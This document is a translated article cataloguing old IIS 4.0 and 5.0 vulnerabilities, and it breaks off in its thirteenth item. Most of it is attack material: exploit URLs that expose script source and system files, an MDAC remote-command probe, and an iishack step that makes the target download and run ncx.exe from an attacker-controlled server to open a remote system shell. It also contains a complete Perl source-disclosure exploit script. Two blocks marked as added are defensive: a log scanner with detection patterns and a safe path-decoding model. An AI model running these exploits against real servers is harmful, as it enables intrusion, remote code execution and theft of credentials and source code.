IIS Vulnerability Collection

xiaoxiao, 2021-03-06

1. Reconnaissance

The methods described here mostly go through port 80, which is a major threat because a web server's port 80 is always open. For convenience, download a WWW/CGI scanner to assist the check. To learn which service program the target machine is running, use telnet (the host name is a placeholder):

    telnet <target> 80
    HEAD / HTTP/1.0

The response returns the domain name and the version of the web service program. If a server runs its web service on 8080, 81, 8000 or 8001, telnet to that port instead.

2. Common vulnerabilities

(1) null.htw
If IIS runs Index Server, it has a vulnerability related to null.htw, a .htw file that does not exist on the server. It leaks the source code of ASP scripts and of Global.asa, which contains sensitive information such as user accounts. An attacker who sends IIS a specially crafted URL can break out of the virtual-directory restriction and access logical partitions and the root directory. The hit-highlighting function does not fully block requests for arbitrary file types in Index Server, so an attacker can reach any file on the server. null.htw takes three variables from user input: CiWebhitsFile, CiRestriction and CiHiliteType. Passing these variables retrieves source code such as default.asp:

    http://www.target.com/null.htw?CiWebhitsFile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

No real .htw file is needed, because the virtual file is already held in memory.

(2) MDAC: local command execution
This vulnerability is fairly old, but on a global scale many IIS web servers may still have it, just as many people still use Windows 3.2 today. IIS's MDAC component has a flaw that lets an attacker run commands on the target system remotely. The core problem is in RDSDataFactory. By default it allows remote commands to be sent to the IIS server, where they run as the account the service runs under, the System user by default. Test for the vulnerability as follows (the host name is a placeholder):

    c:\> nc -nw -w 2 <target> 80
    GET /msadc/msadcs.dll HTTP

If the response contains application/x-varg, the server is very likely unpatched, and the two programs mdac.pl and msadc2.pl from the Rain Forest Puppy website (www.wiretrip.net/rfp) apply.

(3) ASP dot bug
This is an old defect, discovered in 1997. It also leaks ASP source code to an attacker, and usually affects IIS 3.0: appending one or more dots to the end of the requested URL discloses the ASP source.

    http://www.target.com/sample.asp.

(4) .idc and .ida bugs
This vulnerability resembles the ASP dot vulnerability: it reveals web directory information on IIS 4.0, and surprisingly the same kind of vulnerability has also been found on IIS 5.0. Adding an .idc or .ida suffix to the URL makes IIS try to run the .idc through the database connector DLL; if the .idc file does not exist, some information is returned to the client:

    http://www.target.com/anything.idc  or  http://www.target.com/anything.idq

(5) .htr bug
Discovered by NSFOCUS. Appending .htr (after a space, written + in the URL) to a request for some ASA and ASP files leaks their source code:

    http://www.target.com/global.asa+.htr

(6) NT Site Server Adsamples vulnerability
By requesting site.csc, usually stored at /adsamples/config/site.csc, an attacker may obtain database information such as the DSN, UID and PASS:

    http://www.target.com/adsamples/config/site.csc

(7) IIS Hack
Someone discovered an IIS 4.0 buffer overflow that lets a user upload a program, for example uploading netcat to the target server and binding cmd.exe to port 80. The overflow lies in the handling of .htr, .idc and .stm files: URL requests for these file types do not fully bounds-check the file name, so an attacker can insert a back door that downloads and executes a program on the system. Detecting this on a site needs two files, iishack.exe and ncx.exe, which can be downloaded from www.technotronic.com, plus a web server (or virtual server) of your own. Run a web service on your own server with ncx.exe in its directory, then check the target with iishack.exe (host names are placeholders):

    C:\> iishack.exe <target> 80 <your_server>/ncx.exe

Then use netcat to connect to the server you are probing:

    C:\> nc <target> 80

If the overflow offset is right, you get the target machine's command prompt with remote administration privileges.

Codebrws.asp and showcode.asp
Codebrws.asp and showcode.asp ship with IIS 4.0 but are not installed by default; the viewer is installed only when the administrator chooses to install the sample files. The viewer does not restrict which files it will open, so a remote attacker can use it to view the content of any file on the target machine. Note the following:
1. codebrws.asp and showcode.asp are not installed by default.
2. The vulnerability only allows viewing file content.
3. It cannot bypass Windows NT ACL restrictions.
4. Only files on the same partition can be viewed (so installing the IIS directories and the Winnt directory on different partitions is a good solution, and is likely to also block the latest IIS 5.0 Unicode vulnerability).
5. The attacker needs to know the name of the requested file.

For example, if you find these files and the above conditions are met, you can request:

    http://www.target.com/iissamples/exair/howitworks/codebrws.asp?Source=/iissamples/exair/howitworks/codebrws.asp

which shows the source code of codebrws.asp itself. showcode.asp can be used the same way to view files:

    http://www.target.com/msadc/samples/selector/showcode.asp?Source=/msadc/../../../../winnt/win.ini

You can also read FTP log information to find other machines that connect frequently, which may be less secure than the web server itself, for example:

    http://xxx.xxx.xxx.xx/msadc/Sample.asp?Source=/msadc/Samples/Winnt/System32/Logfiles/MSFTPSVC1/EX00517.LOG

(8) WebHits.dll and .htw
The hit-highlighting feature is an entry point provided by Index Server to highlight the original search terms in a document. The document name is passed to the .htw file through the variable CiWebhitsFile; webhits.dll, an ISAPI application, handles the request, opens the file and returns the result. Because the user controls the CiWebhitsFile parameter, any file can be requested, and ASP source and other script file content can be viewed. To find out whether a server is affected, request a non-existent .htw file:

    http://www.target.com/nosuchfile.htw

If the server responds with "Format of the QUERY_STRING is invalid", it is vulnerable. The problem lies in the mapping of .htw files to webhits.dll, so removing that mapping closes the hole. On a system you suspect is vulnerable, search for .htw files; the following are usually present:

    /iissamples/issamples/oop/qfullhit.htw
    /iissamples/issamples/oop/qsumrhit.htw
    /iissamples/exair/search/qfullhit.htw
    /iissamples/exair/search/qsumrhit.htw
    /iishelp/iis/misc/iirturnh.htw  (this one is usually restricted to loopback)

An attacker can read files on a vulnerable system with:

    http://www.target.com/iissamples/issamples/oop/qfullhit.htw?CiWebhitsFile=/../../winnt/win.ini&CiRestriction=none&CiHiliteType=full

(9) ASP Alternate Data Streams (::$DATA)
Published in mid-1998. $DATA is the main data stream attribute of a file on the NTFS file system. By building a specially formatted URL, you can make IIS return that data stream in the browser, which displays the script code contained in the file. There are limits: first, the file must be on an NTFS partition (and NTFS is, unfortunately, widely used on servers); second, the file must be globally readable; and the unauthorized user must know the file name. IIS 1.0, 2.0, 3.0 and 4.0 on Windows NT have this problem, and Microsoft provides patches for IIS 3.0 and 4.0. To view an .asp file, request:

    http://www.target.com/default.asp::$DATA

and you get the source code. For background on data streams in the NTFS file system, see http://focus.silversand.net/newsite/skill/NTFS.TXT.

(10) ism.dll buffer truncation vulnerability
Present in IIS 4.0 and 5.0; it lets an attacker view any file's content and source code. Append about 230 spaces (%20) to the file name, followed by .htr, and send that request to IIS. IIS believes the client requested a .htr file, and since the .htr suffix is mapped to the ism.dll ISAPI application, IIS hands the request to that DLL, which opens and executes the file passed to it; but the buffer truncation in ism.dll cuts off the .htr part, so some content of the file you wanted to open is returned. Note that this attack works only until the web service is stopped and restarted: if a .htr request has already been sent to the machine, the attack fails. It works only the first time ism.dll is loaded into memory.

    http://www.target.com/global.asa%20%20...(up to 230 spaces).htr

(11) Brute-force threat from the .htr programs
IIS 4.0 contains a serious vulnerability that lets remote users attack the user accounts on the web server, even when the server's address is translated through NAT. Every IIS 4.0 installation creates a virtual directory /iisadmpwd containing several .htr files that anonymous users are allowed to access; these files were never restricted to the loopback address (127.0.0.1). Requesting them brings up a dialog that lets you change a user's account password through the web. The directory maps physically to C:\Winnt\System32\inetsrv\iisadmpwd and contains:

    achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr

With these, an attacker can guess your passwords by brute force. If you do not use this service, remove the directory immediately.
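As an added, defender-side example that is not part of the original article: the requests described in items (1) through (11) leave recognisable traces in IIS W3C extended logs, and the following Python script flags them on a constructed log sample. The field layout, the log lines and the rule labels are assumptions made for the illustration.

```python
import re

# Constructed IIS W3C extended log sample (not from the original article); fields:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status ("-" means no query)
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-17 10:01:02 10.0.0.5 GET /default.asp - 200
2000-10-17 10:01:09 10.0.0.5 GET /null.htw CiWebhitsFile=/default.asp&CiRestriction=none&CiHiliteType=full 200
2000-10-17 10:02:11 10.0.0.5 GET /default.asp::$DATA - 200
2000-10-17 10:03:30 10.0.0.5 GET /msadc/msadcs.dll - 200
2000-10-17 10:04:01 10.0.0.5 GET /adsamples/config/site.csc - 200
2000-10-17 10:05:00 10.0.0.5 GET /iisadmpwd/aexp2.htr - 200
2000-10-17 10:06:00 10.0.0.5 GET /msadc/samples/selector/showcode.asp source=/msadc/../../../../winnt/win.ini 200
2000-10-17 10:07:00 10.0.0.5 GET /global.asa+.htr - 200
2000-10-17 10:08:00 10.0.0.5 GET /global.asa%20%20%20%20.htr - 200
2000-10-17 10:09:00 10.0.0.5 GET /anything.idq - 404
"""

# (label, regex) pairs applied to the lower-cased, still percent-encoded "stem?query".
RULES = [
    ("index server .htw source disclosure", r"\.htw\?.*ciwebhitsfile="),
    ("ntfs ::$DATA stream request", r"::\$data"),
    ("msadc / rds probe", r"/msadc/msadcs\.dll"),
    ("site server site.csc request", r"/adsamples/config/site\.csc"),
    ("iisadmpwd password .htr access", r"/iisadmpwd/.*\.htr"),
    ("sample viewer traversal", r"(showcode|codebrws)\.asp\?source=.*\.\./"),
    ("padded or +.htr source disclosure", r"\.(asp|asa)(\+|%20| )+\.htr"),
    ("idc/idq/ida probe", r"\.(idc|idq|ida)(\?|$)"),
]

def scan_line(line):
    """Return the labels of every rule a single log line trips (empty if clean)."""
    parts = line.split()
    if len(parts) < 7 or parts[0].startswith("#"):
        return []
    stem, query = parts[4], parts[5]
    raw = stem.lower() + ("" if query == "-" else "?" + query.lower())
    return [label for label, pat in RULES if re.search(pat, raw)]

def scan_log(text):
    """Return (client ip, uri stem, label) for every hit in a W3C log."""
    hits = []
    for line in text.splitlines():
        for label in scan_line(line):
            hits.append((line.split()[2], line.split()[4], label))
    return hits
```

Matching is done on the raw, still percent-encoded URL so that padding (%20) and other encodings remain visible to the rules.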

(12) Translate: f bug
Posted on August 15, 2000 (www.securityfocus.com/bid/1578). The problem lies in WebDAV in Office 2000 and the FrontPage 2000 Server Extensions: when an ASP/ASA file or other script is requested with an HTTP GET that has a backslash (%5c) appended to the file name and carries a "Translate: f" header, the file's code is displayed instead of being executed. This assumes Win2K SP1 is not installed. It is a W2K vulnerability, but since FP2000 is also installed on IIS 4.0, the vulnerability applies to IIS 4.0 as well. The following script uses this vulnerability:

    ##############################
    # trans.pl
    use Socket;
    my ($port, $sock, $server);
    ##############################
    $server = $ARGV[0];
    $port   = 80;
    $cm     = $ARGV[1];
    &connect;

    sub connect {
        if ($#ARGV < 1) { howto(); exit; }
        # the request: trailing %5c on the file name plus the Translate: f header
        $ver = "GET /$cm%5c HTTP/1.0\nHost: $server\nAccept: */*\nTranslate: f\n\n";
        $proto = getprotobyname('tcp') || die "Error: $!";
        $iaddr = inet_aton($server)    || die "Error: $!";
        $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
        socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
        connect(SOCK, $paddr) || die "Error: $!";
        send(SOCK, $ver, 0)   || die "Can't send packet: $!";
        open(OUT, ">$server.txt");
        print "Dumping $cm to $server.txt\n";
        while (<SOCK>) { print OUT; }   # write the response (the script source) to a file
        close(OUT);
        close(SOCK);
    }

    sub howto { print "Type as follows: trans.pl www.target.com codetoview.asp\n\n"; }

It is used as follows to obtain the source code:

    trans.pl www.target.com default.asp

(13) Unicode decoding error vulnerability in IIS
The NSFOCUS security team found that Microsoft IIS 4.0 and IIS 5.0 have a security vulnerability in their implementation of Unicode character decoding that lets remote users execute arbitrary commands through IIS. When IIS opens a file whose name contains Unicode characters, it decodes them; if the user supplies specially crafted encodings, the decoding error makes IIS open or execute files outside the web root directory. The vulnerability can be used as follows: (1) If the system contains an executable directory, any system command may be executed.
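As an added example, written here for the article and not taken from it or from IIS itself, of why the order of decoding and checking matters in item (13): a strict UTF-8 decoder rejects overlong sequences such as %c0%af, and the traversal check must run on the fully decoded path. The web root and the two resolver functions are simplified models assumed for the illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes

WEB_ROOT = "/inetpub/wwwroot"   # assumed web root for the illustration

def lenient_decode(data):
    """Model of a flawed decoder: folds 2-byte overlong sequences (C0/C1 lead
    byte) back to the ASCII character they encode, so %c0%af becomes '/'."""
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] < 0xC0:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")

def resolve_vulnerable(raw_path):
    """Flawed order: normalise and check the once-decoded path, then decode again."""
    once = unquote_to_bytes(raw_path).decode("latin-1")   # %c0%af is still two opaque bytes
    if not posixpath.normpath(WEB_ROOT + once).startswith(WEB_ROOT + "/"):
        return None                                        # the only traversal check
    final = lenient_decode(once.encode("latin-1")).replace("\\", "/")
    return posixpath.normpath(WEB_ROOT + final)            # second decode reintroduces ../

def resolve_safe(raw_path):
    """Fixed order: strict UTF-8 decode (overlong forms raise), then normalise
    and confirm the final path is still inside WEB_ROOT."""
    try:
        decoded = unquote_to_bytes(raw_path).decode("utf-8")
    except UnicodeDecodeError:
        return None
    full = posixpath.normpath(WEB_ROOT + "/" + decoded.replace("\\", "/").lstrip("/"))
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        return None
    return full
```

The vulnerable resolver stops a plain ../ request but lets the overlong form escape the root; the safe resolver refuses the overlong encoding outright and re-checks the path after decoding.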

